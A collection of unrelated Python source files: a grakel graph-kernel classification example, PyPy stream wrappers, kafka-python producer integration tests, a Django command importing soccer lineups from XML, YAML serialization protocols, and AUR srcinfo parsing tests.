path_to_images=CONST_NEW_IMAGES,
path_to_model=CONST_MODEL_PATH,
class_list=CONST_CLASS_NAMES,
image_size=CONST_IMAGE_SIZE,
normalization_factor=CONST_IMAGE_RESCALE
)
|
"""
=========================================================
Classification statistics on the MUTAG, ENZYMES datasets.
=========================================================
An example plot of :class:`grakel.GraphKernel`
"""
from __future__ import print_function
print(__doc__)
import time
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn import svm
from grakel import datasets
from grakel import GraphKernel
def sec_to_time(sec):
"""Print time in a correct format."""
dt = list()
days = int(sec // 86400)
if days > 0:
sec -= 86400*days
dt.append(str(days) + " d")
hrs = int(sec // 3600)
if hrs > 0:
sec -= 3600*hrs
dt.append(str(hrs) + " h")
mins = int(sec // 60)
if mins > 0:
sec -= 60*mins
dt.append(str(mins) + " m")
if sec > 0:
dt.append(str(round(sec, 2)) + " s")
return " ".join(dt)
# Loads the MUTAG, ENZYMES dataset from:
# https://ls11-www.cs.tu-dortmund.de/staff/morris/graphkerneldatasets
# the biggest collection of benchmark datasets for graph_kernels.
kernels = {
"Shortest Path": [{"name": "shortest_path"}],
"Graphlet Sampling": [{"name": "graphlet_sampling",
"sampling": {"n_samples": 150}}],
"Weisfeiler-Lehman/Subtree": [{"name": "weisfeiler_lehman", "niter": 5},
{"name": "subtree_wl"}],
"Weisfeiler-Lehman/Shortest-Path": [{"name": "weisfeiler_lehman",
"niter": 5},
{"name": "shortest_path"}]
}
columns = ["MUTAG", "MSRC_21C"]
rows = sorted(list(kernels.keys()))
data_dataset = list()
for (j, d) in enumerate(columns):
print(d)
data_kernel = list()
dataset_d = datasets.fetch_dataset(d, verbose=False)
G, y = dataset_d.data, dataset_d.target
# Train-test split of graph data
G_train, G_test, y_train, y_test = train_test_split(G, y, test_size=0.1)
for (i, k) in enumerate(rows):
print(k, end=" ")
gk = GraphKernel(kernel=kernels[k], normalize=True)
print("", end=".")
# Calculate the kernel matrix.
start = time.time()
K_train = gk.fit_transform(G_train)
K_test = gk.transform(G_test)
end = time.time()
print("", end=".")
# Initialise an SVM and fit.
clf = svm.SVC(kernel='precomputed')
clf.fit(K_train, y_train)
print("", end=". ")
# Predict and test.
y_pred = clf.predict(K_test)
# Calculate accuracy of classification.
data_kernel.append(
sec_to_time(round(end - start, 2)) +
" ~ " + str(round(accuracy_score(y_test, y_pred)*100, 2)) + "%")
print(data_kernel[-1])
data_dataset.append(data_kernel)
print("")
# Print results on a table using pyplot
bbox = [0.45, 0.25, 0.6, 0.6]
table = plt.table(cellText=[list(q) for q in zip(*data_dataset)],
rowLabels=rows, colLabels=columns, cellLoc = 'center',
rowLoc = 'center', loc='center', bbox=bbox)
_ = plt.axis('off')
plt.show()
|
import py
from rpython.rlib import streamio
from rpython.rlib.streamio import StreamErrors
from pypy.interpreter.error import OperationError, oefmt
from pypy.interpreter.baseobjspace import ObjSpace, W_Root, CannotHaveLock
from pypy.interpreter.typedef import TypeDef
from pypy.interpreter.gateway import interp2app
from pypy.interpreter.streamutil import wrap_streamerror, wrap_oserror_as_ioerror
class W_AbstractStream(W_Root):
"""Base class for interp-level objects that expose streams to app-level"""
slock = None
slockowner = None
# Locking issues:
# * Multiple threads can access the same W_AbstractStream in
# parallel, because many of the streamio calls eventually
# release the GIL in some external function call.
# * Parallel accesses have bad (and crashing) effects on the
# internal state of the buffering levels of the stream in
# particular.
# * We can't easily have a lock on each W_AbstractStream because we
# can't translate prebuilt lock objects.
# We are still protected by the GIL, so the easiest is to create
# the lock on-demand.
def __init__(self, space, stream):
self.space = space
self.stream = stream
def _try_acquire_lock(self):
# this function runs with the GIL acquired so there is no race
# condition in the creation of the lock
me = self.space.getexecutioncontext() # used as thread ident
if self.slockowner is not None:
if self.slockowner is me:
return False # already acquired by the current thread
if self.slockowner.thread_disappeared:
self.slockowner = None
self.slock = None
try:
if self.slock is None:
self.slock = self.space.allocate_lock()
except CannotHaveLock:
pass
else:
self.slock.acquire(True)
assert self.slockowner is None
self.slockowner = me
return True
def _release_lock(self):
self.slockowner = None
if self.slock is not None:
self.slock.release()
def lock(self):
if not self._try_acquire_lock():
raise oefmt(self.space.w_RuntimeError, "stream lock already held")
def unlock(self):
me = self.space.getexecutioncontext() # used as thread ident
if self.slockowner is not me:
raise oefmt(self.space.w_RuntimeError, "stream lock is not held")
self._release_lock()
def _cleanup_(self):
# remove the lock object, which will be created again as needed at
# run-time.
self.slock = None
assert self.slockowner is None
def stream_read(self, n):
"""
An interface for direct interp-level usage of W_AbstractStream,
e.g. from interp_marshal.py.
NOTE: this assumes that the stream lock is already acquired.
Like os.read(), this can return less than n bytes.
"""
try:
return self.stream.read(n)
except StreamErrors as e:
raise wrap_streamerror(self.space, e)
def do_write(self, data):
"""
An interface for direct interp-level usage of W_Stream,
e.g. from interp_marshal.py.
NOTE: this assumes that the stream lock is already acquired.
"""
try:
self.stream.write(data)
except StreamErrors as e:
raise wrap_streamerror(self.space, e)
# ____________________________________________________________
class W_Stream(W_AbstractStream):
"""A class that exposes the raw stream interface to app-level."""
# this exists for historical reasons, and kept around in case we want
# to re-expose the raw stream interface to app-level.
for name, argtypes in streamio.STREAM_METHODS.iteritems():
numargs = len(argtypes)
args = ", ".join(["v%s" % i for i in range(numargs)])
exec py.code.Source("""
def %(name)s(self, space, %(args)s):
acquired = self.try_acquire_lock()
try:
try:
result = self.stream.%(name)s(%(args)s)
except streamio.StreamError, e:
raise OperationError(space.w_ValueError,
space.wrap(e.message))
except OSError, e:
raise wrap_oserror_as_ioerror(space, e)
finally:
if acquired:
self.release_lock()
return space.wrap(result)
%(name)s.unwrap_spec = [W_Stream, ObjSpace] + argtypes
""" % locals()).compile() in globals()
W_Stream.typedef = TypeDef("Stream",
lock = interp2app(W_Stream.lock),
unlock = interp2app(W_Stream.unlock),
**dict([(name, interp2app(globals()[name]))
for name, _ in streamio.STREAM_METHODS.iteritems()]))
|
<filename>test/test_producer_integration.py
import os
import time
import uuid
from six.moves import range
from kafka import (
SimpleProducer, KeyedProducer,
create_message, create_gzip_message, create_snappy_message,
RoundRobinPartitioner, HashedPartitioner
)
from kafka.codec import has_snappy
from kafka.common import (
FetchRequest, ProduceRequest,
UnknownTopicOrPartitionError, LeaderNotAvailableError
)
from test.fixtures import ZookeeperFixture, KafkaFixture
from test.testutil import KafkaIntegrationTestCase, kafka_versions
class TestKafkaProducerIntegration(KafkaIntegrationTestCase):
topic = b'produce_topic'
@classmethod
def setUpClass(cls): # noqa
if not os.environ.get('KAFKA_VERSION'):
return
cls.zk = ZookeeperFixture.instance()
cls.server = KafkaFixture.instance(0, cls.zk.host, cls.zk.port)
@classmethod
def tearDownClass(cls): # noqa
if not os.environ.get('KAFKA_VERSION'):
return
cls.server.close()
cls.zk.close()
@kafka_versions("all")
def test_produce_many_simple(self):
start_offset = self.current_offset(self.topic, 0)
self.assert_produce_request(
[create_message(("Test message %d" % i).encode('utf-8'))
for i in range(100)],
start_offset,
100,
)
self.assert_produce_request(
[create_message(("Test message %d" % i).encode('utf-8'))
for i in range(100)],
start_offset+100,
100,
)
@kafka_versions("all")
def test_produce_10k_simple(self):
start_offset = self.current_offset(self.topic, 0)
self.assert_produce_request(
[create_message(("Test message %d" % i).encode('utf-8'))
for i in range(10000)],
start_offset,
10000,
)
@kafka_versions("all")
def test_produce_many_gzip(self):
start_offset = self.current_offset(self.topic, 0)
message1 = create_gzip_message([
("Gzipped 1 %d" % i).encode('utf-8') for i in range(100)])
message2 = create_gzip_message([
("Gzipped 2 %d" % i).encode('utf-8') for i in range(100)])
self.assert_produce_request(
[ message1, message2 ],
start_offset,
200,
)
@kafka_versions("all")
def test_produce_many_snappy(self):
self.skipTest("All snappy integration tests fail with nosnappyjava")
start_offset = self.current_offset(self.topic, 0)
self.assert_produce_request([
create_snappy_message(["Snappy 1 %d" % i for i in range(100)]),
create_snappy_message(["Snappy 2 %d" % i for i in range(100)]),
],
start_offset,
200,
)
@kafka_versions("all")
def test_produce_mixed(self):
start_offset = self.current_offset(self.topic, 0)
msg_count = 1+100
messages = [
create_message(b"Just a plain message"),
create_gzip_message([
("Gzipped %d" % i).encode('utf-8') for i in range(100)]),
]
# All snappy integration tests fail with nosnappyjava
if False and has_snappy():
msg_count += 100
messages.append(create_snappy_message(["Snappy %d" % i for i in range(100)]))
self.assert_produce_request(messages, start_offset, msg_count)
@kafka_versions("all")
def test_produce_100k_gzipped(self):
start_offset = self.current_offset(self.topic, 0)
self.assert_produce_request([
create_gzip_message([
("Gzipped batch 1, message %d" % i).encode('utf-8')
for i in range(50000)])
],
start_offset,
50000,
)
self.assert_produce_request([
create_gzip_message([
("Gzipped batch 1, message %d" % i).encode('utf-8')
for i in range(50000)])
],
start_offset+50000,
50000,
)
############################
# SimpleProducer Tests #
############################
@kafka_versions("all")
def test_simple_producer(self):
start_offset0 = self.current_offset(self.topic, 0)
start_offset1 = self.current_offset(self.topic, 1)
producer = SimpleProducer(self.client)
# Goes to first partition, randomly.
resp = producer.send_messages(self.topic, self.msg("one"), self.msg("two"))
self.assert_produce_response(resp, start_offset0)
# Goes to the next partition, randomly.
resp = producer.send_messages(self.topic, self.msg("three"))
self.assert_produce_response(resp, start_offset1)
self.assert_fetch_offset(0, start_offset0, [ self.msg("one"), self.msg("two") ])
self.assert_fetch_offset(1, start_offset1, [ self.msg("three") ])
# Goes back to the first partition because there's only two partitions
resp = producer.send_messages(self.topic, self.msg("four"), self.msg("five"))
self.assert_produce_response(resp, start_offset0+2)
self.assert_fetch_offset(0, start_offset0, [ self.msg("one"), self.msg("two"), self.msg("four"), self.msg("five") ])
producer.stop()
@kafka_versions("all")
def test_produce__new_topic_fails_with_reasonable_error(self):
new_topic = 'new_topic_{guid}'.format(guid = str(uuid.uuid4())).encode('utf-8')
producer = SimpleProducer(self.client)
# At first it doesn't exist
with self.assertRaises((UnknownTopicOrPartitionError,
LeaderNotAvailableError)):
producer.send_messages(new_topic, self.msg("one"))
@kafka_versions("all")
def test_producer_random_order(self):
producer = SimpleProducer(self.client, random_start = True)
resp1 = producer.send_messages(self.topic, self.msg("one"), self.msg("two"))
resp2 = producer.send_messages(self.topic, self.msg("three"))
resp3 = producer.send_messages(self.topic, self.msg("four"), self.msg("five"))
self.assertEqual(resp1[0].partition, resp3[0].partition)
self.assertNotEqual(resp1[0].partition, resp2[0].partition)
@kafka_versions("all")
def test_producer_ordered_start(self):
producer = SimpleProducer(self.client, random_start = False)
resp1 = producer.send_messages(self.topic, self.msg("one"), self.msg("two"))
resp2 = producer.send_messages(self.topic, self.msg("three"))
resp3 = producer.send_messages(self.topic, self.msg("four"), self.msg("five"))
self.assertEqual(resp1[0].partition, 0)
self.assertEqual(resp2[0].partition, 1)
self.assertEqual(resp3[0].partition, 0)
@kafka_versions("all")
def test_round_robin_partitioner(self):
start_offset0 = self.current_offset(self.topic, 0)
start_offset1 = self.current_offset(self.topic, 1)
producer = KeyedProducer(self.client, partitioner=RoundRobinPartitioner)
resp1 = producer.send(self.topic, self.key("key1"), self.msg("one"))
resp2 = producer.send(self.topic, self.key("key2"), self.msg("two"))
resp3 = producer.send(self.topic, self.key("key3"), self.msg("three"))
resp4 = producer.send(self.topic, self.key("key4"), self.msg("four"))
self.assert_produce_response(resp1, start_offset0+0)
self.assert_produce_response(resp2, start_offset1+0)
self.assert_produce_response(resp3, start_offset0+1)
self.assert_produce_response(resp4, start_offset1+1)
self.assert_fetch_offset(0, start_offset0, [ self.msg("one"), self.msg("three") ])
self.assert_fetch_offset(1, start_offset1, [ self.msg("two"), self.msg("four") ])
producer.stop()
@kafka_versions("all")
def test_hashed_partitioner(self):
start_offset0 = self.current_offset(self.topic, 0)
start_offset1 = self.current_offset(self.topic, 1)
producer = KeyedProducer(self.client, partitioner=HashedPartitioner)
resp1 = producer.send(self.topic, self.key("1"), self.msg("one"))
resp2 = producer.send(self.topic, self.key("2"), self.msg("two"))
resp3 = producer.send(self.topic, self.key("3"), self.msg("three"))
resp4 = producer.send(self.topic, self.key("3"), self.msg("four"))
resp5 = producer.send(self.topic, self.key("4"), self.msg("five"))
offsets = {0: start_offset0, 1: start_offset1}
messages = {0: [], 1: []}
keys = [self.key(k) for k in ["1", "2", "3", "3", "4"]]
resps = [resp1, resp2, resp3, resp4, resp5]
msgs = [self.msg(m) for m in ["one", "two", "three", "four", "five"]]
for key, resp, msg in zip(keys, resps, msgs):
k = hash(key) % 2
offset = offsets[k]
self.assert_produce_response(resp, offset)
offsets[k] += 1
messages[k].append(msg)
self.assert_fetch_offset(0, start_offset0, messages[0])
self.assert_fetch_offset(1, start_offset1, messages[1])
producer.stop()
@kafka_versions("all")
def test_acks_none(self):
start_offset0 = self.current_offset(self.topic, 0)
producer = SimpleProducer(self.client, req_acks=SimpleProducer.ACK_NOT_REQUIRED)
resp = producer.send_messages(self.topic, self.msg("one"))
self.assertEqual(len(resp), 0)
self.assert_fetch_offset(0, start_offset0, [ self.msg("one") ])
producer.stop()
@kafka_versions("all")
def test_acks_local_write(self):
start_offset0 = self.current_offset(self.topic, 0)
producer = SimpleProducer(self.client, req_acks=SimpleProducer.ACK_AFTER_LOCAL_WRITE)
resp = producer.send_messages(self.topic, self.msg("one"))
self.assert_produce_response(resp, start_offset0)
self.assert_fetch_offset(0, start_offset0, [ self.msg("one") ])
producer.stop()
@kafka_versions("all")
def test_acks_cluster_commit(self):
start_offset0 = self.current_offset(self.topic, 0)
producer = SimpleProducer(
self.client,
req_acks=SimpleProducer.ACK_AFTER_CLUSTER_COMMIT)
resp = producer.send_messages(self.topic, self.msg("one"))
self.assert_produce_response(resp, start_offset0)
self.assert_fetch_offset(0, start_offset0, [ self.msg("one") ])
producer.stop()
@kafka_versions("all")
def test_batched_simple_producer__triggers_by_message(self):
start_offset0 = self.current_offset(self.topic, 0)
start_offset1 = self.current_offset(self.topic, 1)
producer = SimpleProducer(self.client,
batch_send=True,
batch_send_every_n=5,
batch_send_every_t=20)
# Send 5 messages and do a fetch
resp = producer.send_messages(self.topic,
self.msg("one"),
self.msg("two"),
self.msg("three"),
self.msg("four"),
)
# Batch mode is async. No ack
self.assertEqual(len(resp), 0)
# It hasn't sent yet
self.assert_fetch_offset(0, start_offset0, [])
self.assert_fetch_offset(1, start_offset1, [])
resp = producer.send_messages(self.topic,
self.msg("five"),
self.msg("six"),
self.msg("seven"),
)
# Batch mode is async. No ack
self.assertEqual(len(resp), 0)
self.assert_fetch_offset(0, start_offset0, [
self.msg("one"),
self.msg("two"),
self.msg("three"),
self.msg("four"),
])
self.assert_fetch_offset(1, start_offset1, [
self.msg("five"),
# self.msg("six"),
# self.msg("seven"),
])
producer.stop()
@kafka_versions("all")
def test_batched_simple_producer__triggers_by_time(self):
start_offset0 = self.current_offset(self.topic, 0)
start_offset1 = self.current_offset(self.topic, 1)
producer = SimpleProducer(self.client,
batch_send=True,
batch_send_every_n=100,
batch_send_every_t=5)
# Send 5 messages and do a fetch
resp = producer.send_messages(self.topic,
self.msg("one"),
self.msg("two"),
self.msg("three"),
self.msg("four"),
)
# Batch mode is async. No ack
self.assertEqual(len(resp), 0)
# It hasn't sent yet
self.assert_fetch_offset(0, start_offset0, [])
self.assert_fetch_offset(1, start_offset1, [])
resp = producer.send_messages(self.topic,
self.msg("five"),
self.msg("six"),
self.msg("seven"),
)
# Batch mode is async. No ack
self.assertEqual(len(resp), 0)
# Wait the timeout out
time.sleep(5)
self.assert_fetch_offset(0, start_offset0, [
self.msg("one"),
self.msg("two"),
self.msg("three"),
self.msg("four"),
])
self.assert_fetch_offset(1, start_offset1, [
self.msg("five"),
self.msg("six"),
self.msg("seven"),
])
producer.stop()
@kafka_versions("all")
def test_async_simple_producer(self):
start_offset0 = self.current_offset(self.topic, 0)
producer = SimpleProducer(self.client, async=True)
resp = producer.send_messages(self.topic, self.msg("one"))
self.assertEqual(len(resp), 0)
self.assert_fetch_offset(0, start_offset0, [ self.msg("one") ])
producer.stop()
@kafka_versions("all")
def test_async_keyed_producer(self):
start_offset0 = self.current_offset(self.topic, 0)
producer = KeyedProducer(self.client, partitioner = RoundRobinPartitioner, async=True)
resp = producer.send(self.topic, self.key("key1"), self.msg("one"))
self.assertEqual(len(resp), 0)
self.assert_fetch_offset(0, start_offset0, [ self.msg("one") ])
producer.stop()
def assert_produce_request(self, messages, initial_offset, message_ct):
produce = ProduceRequest(self.topic, 0, messages=messages)
# There should only be one response message from the server.
# This will throw an exception if there's more than one.
resp = self.client.send_produce_request([ produce ])
self.assert_produce_response(resp, initial_offset)
self.assertEqual(self.current_offset(self.topic, 0), initial_offset + message_ct)
def assert_produce_response(self, resp, initial_offset):
self.assertEqual(len(resp), 1)
self.assertEqual(resp[0].error, 0)
self.assertEqual(resp[0].offset, initial_offset)
def assert_fetch_offset(self, partition, start_offset, expected_messages):
# There should only be one response message from the server.
# This will throw an exception if there's more than one.
resp, = self.client.send_fetch_request([ FetchRequest(self.topic, partition, start_offset, 1024) ])
self.assertEqual(resp.error, 0)
self.assertEqual(resp.partition, partition)
messages = [ x.message.value for x in resp.messages ]
self.assertEqual(messages, expected_messages)
self.assertEqual(resp.highwaterMark, start_offset+len(expected_messages))
|
<reponame>awyrough/xsoccer
### Read from F9 files and construct Lineup models
import utils.xmls as xml_utils
import datetime
import os
import time
from teams.models import Team
from games.models import Game
from players.models import Player
from lineups.models import Lineup
from django.core.management.base import BaseCommand
def is_tag(xml_obj, tag):
"""Return true if the XML object is the Tag"""
return xml_obj.tag == tag
def is_tag_and_type(xml_obj, tag, type):
"""Return true if the XML object is of the right Tag and Type"""
return xml_obj.tag == tag and xml_utils.get_attrib(xml_obj,"Type") == type
class Command(BaseCommand):
"""
Sample usage:
python manage.py build_lineup_table_ALL_FILES \
--dry_run \
--data_filepath=data/f9/
"""
help = "Populate game table"
def add_arguments(self, parser):
"""Add custom CLI arguments"""
parser.add_argument(
"--dry_run",
action="store_true",
dest="dry_run",
default=False,
help="Don't save and just print teams",
)
parser.add_argument(
"--data_filepath",
dest="data_filepath",
type=str,
required=True,
help="Filepath containing all data files to load",
)
def handle(self, *args, **options):
script_start = time.time()
data_filepath = options["data_filepath"]
is_dry_run = options["dry_run"]
print "Importing Lineups from %s" % data_filepath
if is_dry_run:
print "This is a dry run and will not save any data"
potential_save_count = 0
saved_count = 0
pull_count = 0
file_count = 0
for root_dir, sub_dirs, filenames in os.walk(data_filepath):
for f in filenames:
file_start = time.time()
#ignore the hidden .DS_Store files
if f[-4:] != ".xml":
continue
file_count += 1
file_saved_count = 0
xml_file = os.path.join(data_filepath, f)
new_lineups = []
#Open up F9 and find root: <SoccerFeed>
xml_data_root = xml_utils.get_root_from_file(xml_file)
#Find <SoccerDocument>
xml_SoccerDocument = xml_utils.get_tag(xml_data_root, "SoccerDocument")
#Evaluate if the game has two SoccerDocument components; if so, ignore the repeat
if xml_utils.get_child_count(xml_data_root, "SoccerDocument") == 2:
xml_MatchData = xml_utils.get_tag(xml_SoccerDocument, "MatchData")
xml_MatchInfo = xml_utils.get_tag(xml_MatchData, "MatchInfo")
match_type = xml_utils.get_attrib(xml_MatchInfo,"MatchType")
if match_type == "1st Leg":
continue #skip the first leg if two legs in file (aka file is for 2nd leg)
game_uuid = xml_utils.get_attrib(xml_SoccerDocument, "uID")
db_game = Game.objects.get(uuid=game_uuid)
#Find <MatchData>
xml_MatchData = xml_utils.get_tag(xml_SoccerDocument, "MatchData")
#Find <TeamData>
for team_data in xml_utils.get_children(xml_MatchData):
if is_tag(team_data,"TeamData") == False:
continue #skip if it's not an actual <TeamData> team
team_uuid = xml_utils.get_attrib(team_data, "TeamRef")
db_team = Team.objects.get(uuid=team_uuid)
#Comb through <TeamData> and only pull the "formation_used" team Stat
team_formation = xml_utils.get_tag_and_type(team_data, "Stat", "formation_used").text
#Find the XML object <PlayerLinerUp>
xml_PlayerLineUp = xml_utils.get_tag(team_data, "PlayerLineUp")
#Check if TeamData is empty (aka the game was postponed)
if xml_PlayerLineUp is None:
continue
#Iterate over players on a team
for xml_MatchPlayer in xml_utils.get_children(xml_PlayerLineUp):
#find player
player_uuid = xml_utils.get_attrib(xml_MatchPlayer,"PlayerRef")
db_player = Player.objects.get(uuid=player_uuid)
#find player position
player_position = xml_utils.get_attrib(xml_MatchPlayer,"Position")
player_subposition = xml_utils.get_attrib_if_exists(xml_MatchPlayer,"SubPosition")
#find if player is captain
is_captain = xml_utils.get_attrib_if_exists(xml_MatchPlayer,"Captain")
if is_captain: #if it exists, make variable a True boolean
is_captain = True
else:
is_captain = False
formation_place = xml_utils.get_tag_and_type(xml_MatchPlayer, "Stat", "formation_place").text
if formation_place:
formation_place = int(formation_place)
else:
formation_place = int(0)
lineup = Lineup(
game=db_game
,team=db_team
,player=db_player
,team_formation=team_formation
,player_position=player_position
,player_subposition=player_subposition
,is_captain=is_captain
,player_formation_number=formation_place
)
new_lineups.append(lineup)
pull_count += 1
# get all existing objects, just want for the game/player;
# this is admittedly slow for game/players where the data is already populated; shouldn't be too bad though
existing_lineups = Lineup.objects.filter(game=db_game)
existing_players = [str(i.player.uuid) for i in existing_lineups]
# log out for audit and save if not dry run and it is a new team
for lineup in new_lineups:
if is_dry_run == True and lineup.player.uuid not in existing_players:
potential_save_count += 1
elif is_dry_run == False and lineup.player.uuid not in existing_players:
lineup.save()
saved_count += 1
file_saved_count += 1
#print lineup
file_end = time.time()
print "# files parsed = %s; saved Lineups = %s; file time = %s secs; closing %s..." % (str(file_count), (file_saved_count), (file_end - file_start), f)
print "\n# lineups pulled from files = %s" % (str(pull_count))
print "\n# lineups that would've been saved to DB = %s" % (str(potential_save_count))
print "\n# lineups actually saved to DB = %s" % (str(saved_count))
script_end = time.time()
print "\n%s minutes to complete script" % ((script_end - script_start) / 60) |
# Copyright 2012 Yelp
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Represent data in single-line YAML.
:py:class:`YAMLProtocol` can handle nearly any data type, and can serve as a
more readable alternative to :py:class:`~mrjob.protocol.PickleProtocol`.
As with pickle, you should be careful about reading untrusted data with this
protocol, because it can execute arbitrary code; also, this format is
Python-specific.
:py:class:`SafeYAMLProtocol` supports basic YAML data types, which are
a superset of JSON data types, and are supported across YAML implementations.
We also provide :py:class:`YAMLValueProtocol` and :py:class:`SafeYAMLProtocol`
to handle values without keys.
"""
from __future__ import absolute_import
import yaml
import six
from mr3px.common import decode_string, encode_string
__all__ = [
'SafeYAMLProtocol',
'SafeYAMLValueProtocol',
'YAMLProtocol',
'YAMLValueProtocol',
]
def dump_inline(data, allow_unicode=None, encoding=None, safe=False):
"""Dump YAML on a single line.
:param allow_unicode: Don't escape non-ASCII characters in the result.
:param encoding: Optional character encoding to use. If not set,
return unicode
:param safe: if True, use :py:func:`yaml.safe_dump`; that is, only encode
basic value types; otherwise use :py:func:`yaml.dump`
:param kwargs: additional keyword arguments to pass through to
:py:func:`yaml.dump`. Only *allow_unicode* and
*encoding* seem to be useful.
"""
dump = yaml.safe_dump if safe else yaml.dump
out = dump(
data,
allow_unicode=allow_unicode,
default_flow_style='block',
explicit_end=False,
explicit_start=False,
line_break='\n',
width=float('inf')).rstrip()
if out.endswith(six.u('\n...')):
out = out[:-3].rstrip()
return out.encode(encoding)
class YAMLProtocolBase(object):
safe = True
def __init__(self, allow_unicode=False, encoding=None):
"""Optional parameters:
:param allow_unicode: Allow non-ASCII characters in the output
(e.g. accented characters).
:param encoding: Character encoding to use. We default to UTF-8,
with fallback to latin-1 when decoding input.
"""
self.allow_unicode = allow_unicode
self.encoding = encoding
def load(self, data):
unicode_data = decode_string(data, encoding=self.encoding)
if self.safe:
return yaml.safe_load(unicode_data)
else:
return yaml.load(unicode_data)
def dump(self, data):
return dump_inline(
data,
allow_unicode=self.allow_unicode,
encoding=self.encoding or 'utf_8', # never return Unicode
safe=self.safe)
class SafeYAMLProtocol(YAMLProtocolBase):
"""Encode/decode keys and values that can be represented using
YAML tags. This is a superset of JSON, and includes most basic data
structures; for a full list see
http://pyyaml.org/wiki/PyYAMLDocumentation#YAMLtagsandPythontypes.
Note that this will encode tuples as lists.
"""
def read(self, line):
key_str, value_str = decode_string(line, self.encoding).split('\t')
key_str = encode_string(key_str, self.encoding)
value_str = encode_string(value_str, self.encoding)
# cache last key
if key_str != getattr(self, '_key_cache', [None])[0]:
self._key_cache = (key_str, self.load(key_str))
key = self._key_cache[1]
return key, self.load(value_str)
def write(self, key, value):
de_key = decode_string(self.dump(key), encoding=self.encoding)
de_value = decode_string(self.dump(value), encoding=self.encoding)
return encode_string('%s\t%s' % (de_key, de_value), self.encoding)
# return six.b('%s\t%s' % (self.dump(key), self.dump(value)))
class YAMLProtocol(SafeYAMLProtocol):
"""Encode/decode keys and values of virtually any type using YAML.
"""
safe = False
class SafeYAMLValueProtocol(YAMLProtocolBase):
"""Encode/decode keys and values that can be represented using
YAML tags. This is a superset of JSON, and includes most basic data
structures; for a full list see
http://pyyaml.org/wiki/PyYAMLDocumentation#YAMLtagsandPythontypes.
Note that this will encode tuples as lists.
"""
def read(self, line):
return None, self.load(line)
def write(self, _, value):
return self.dump(value)
class YAMLValueProtocol(SafeYAMLValueProtocol):
"""Encode/decode values of virtually any type using YAML.
"""
safe = False
|
import os
from unittest import TestCase
from bauh.gems.arch import aur
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
class AURModuleTest(TestCase):
def test_map_srcinfo__only_one_pkgname(self):
expected_fields = {
'pkgbase': 'bauh',
'pkgname': 'bauh',
'pkgver': '0.9.6',
'pkgrel': '2',
'url': 'https://github.com/vinifmor/bauh',
'arch': 'any',
'license': 'zlib/libpng',
'makedepends': ['git', 'python', 'python-pip', 'python-setuptools'],
'depends': [
'python', 'python-colorama', 'python-pyaml', 'python-pyqt5', 'python-pyqt5-sip', 'python-requests', 'qt5-svg'
],
'optdepends': [
'flatpak: required for Flatpak support',
'python-beautifulsoup4: for Native Web applications support',
'python-lxml: for Native Web applications support',
'snapd: required for Snap support'
],
'source': ['https://github.com/vinifmor/bauh/archive/0.9.6.tar.gz'],
'sha512sums': ['cb1820b8a41dccec746d91d71b7f524c2e3caf6b30b0cd9666598b8ad49302654d9ce9bd1a0a2a9612afebc27ef78a2a94ac10e4e6c183742effe4feeabaa7b2']
}
with open(FILE_DIR + '/resources/bauh_srcinfo') as f:
srcinfo = f.read()
res = aur.map_srcinfo(srcinfo, 'bauh')
for key, val in expected_fields.items():
self.assertIn(key, res, "key '{}' not in res".format(key))
if isinstance(val, list):
val.sort()
res[key].sort()
self.assertEqual(val, res[key], "expected: {}. current: {}".format(val, res[key]))
def test_map_srcinfo__one_name__only_specific_fields(self):
expected_fields = {
'pkgver': '0.9.6',
'pkgrel': '2'
}
with open(FILE_DIR + '/resources/bauh_srcinfo') as f:
srcinfo = f.read()
res = aur.map_srcinfo(srcinfo, 'bauh', fields={*expected_fields.keys()})
self.assertEqual(len(expected_fields), len(res), "Expected: {}. Current: {}".format(len(expected_fields), len(res)))
for key, val in expected_fields.items():
self.assertIn(key, res, "key '{}' not in res".format(key))
if isinstance(val, list):
val.sort()
res[key].sort()
self.assertEqual(val, res[key], "expected: {}. current: {}".format(val, res[key]))
def test_map_srcinfo__several_pkgnames__pkgname_specified_case_1(self):
expected_fields = {
'pkgbase': 'mangohud',
'pkgname': 'mangohud',
'pkgver': '0.5.1',
'pkgrel': '3',
'pkgdesc': 'A Vulkan overlay layer for monitoring FPS, temperatures, CPU/GPU load and more',
'source': ['mangohud-0.5.1.tar.gz::https://github.com/flightlessmango/MangoHud/archive/v0.5.1.tar.gz'],
'sha256sums': ['3e91d4fc7369d46763894c13f3315133871dd02705072981770c3cf58e8081c6'],
'license': 'MIT',
'arch': 'x86_64',
'url': 'https://github.com/flightlessmango/MangoHud',
'makedepends': [
'glslang', 'libglvnd', 'lib32-libglvnd', 'meson', 'python-mako', 'vulkan-headers', 'vulkan-icd-loader',
'lib32-vulkan-icd-loader', 'libxnvctrl'
],
'depends': ['gcc-libs', 'mangohud-common'],
'optdepends': ['bash: mangohud helper script', 'libxnvctrl: support for older NVIDIA GPUs']
}
with open(FILE_DIR + '/resources/mangohud_srcinfo') as f:
srcinfo = f.read()
res = aur.map_srcinfo(srcinfo, 'mangohud')
self.assertEqual(len(expected_fields), len(res), "Expected: {}. Current: {}".format(len(expected_fields), len(res)))
for key, val in expected_fields.items():
self.assertIn(key, res, "key '{}' not in res".format(key))
if isinstance(val, list):
val.sort()
if isinstance(res[key], list):
res[key].sort()
self.assertEqual(val, res[key], "expected: {}. current: {}".format(val, res[key]))
def test_map_srcinfo__several_pkgnames__pkgname_specified_case_2(self):
expected_fields = {
'pkgbase': 'mangohud',
'pkgname': 'mangohud-common',
'pkgver': '0.5.1',
'pkgrel': '3',
'pkgdesc': 'Common files for mangohud and lib32-mangohud',
'source': ['mangohud-0.5.1.tar.gz::https://github.com/flightlessmango/MangoHud/archive/v0.5.1.tar.gz'],
'sha256sums': ['3e91d4fc7369d46763894c13f3315133871dd02705072981770c3cf58e8081c6'],
'license': 'MIT',
'url': 'https://github.com/flightlessmango/MangoHud',
'arch': 'x86_64',
'makedepends': [
'glslang', 'libglvnd', 'lib32-libglvnd', 'meson', 'python-mako', 'vulkan-headers', 'vulkan-icd-loader',
'lib32-vulkan-icd-loader', 'libxnvctrl'
],
'optdepends': ['bash: mangohud helper script']
}
